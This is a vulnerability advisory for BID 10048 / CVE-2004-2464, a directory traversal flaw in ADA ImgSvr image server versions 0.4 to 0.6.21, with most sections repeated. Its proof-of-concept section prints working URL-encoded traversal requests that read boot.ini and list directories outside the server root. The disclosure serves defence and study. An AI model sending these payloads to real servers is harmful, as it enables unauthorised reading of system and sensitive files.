ADA IMGSVR Directory Traversal Vulnerability
BID:10048
Info
ADA IMGSVR Directory Traversal Vulnerability
| Bugtraq ID: | 10048 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-2464 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 05 2004 12:00AM |
| Updated: | Jan 02 2008 09:10PM |
| Credit: | Disclosure of this issue is credited to Dr-insane. |
| Vulnerable: |
ImgSvr ImgSvr 0.6.21 ImgSvr ImgSrv 0.6.5 ADA ImgSvr 0.4 |
| Not Vulnerable: | |
Discussion
ADA IMGSVR Directory Traversal Vulnerability
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
Exploit / POC
ADA IMGSVR Directory Traversal Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
No exploit is required to leverage this issue. The following proof of concept has been provided:
To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Solution / Fix
ADA IMGSVR Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ADA IMGSVR Directory Traversal Vulnerability
References:
References:
- ADA Image Server (ImgSvr) 0.4 Multiple vulnerabilities (Dr_insane)
- ImgSvr Home Page (ADA)
- Double directory traversal in ImgSvr 0.6.21 (Luigi Auriemma
)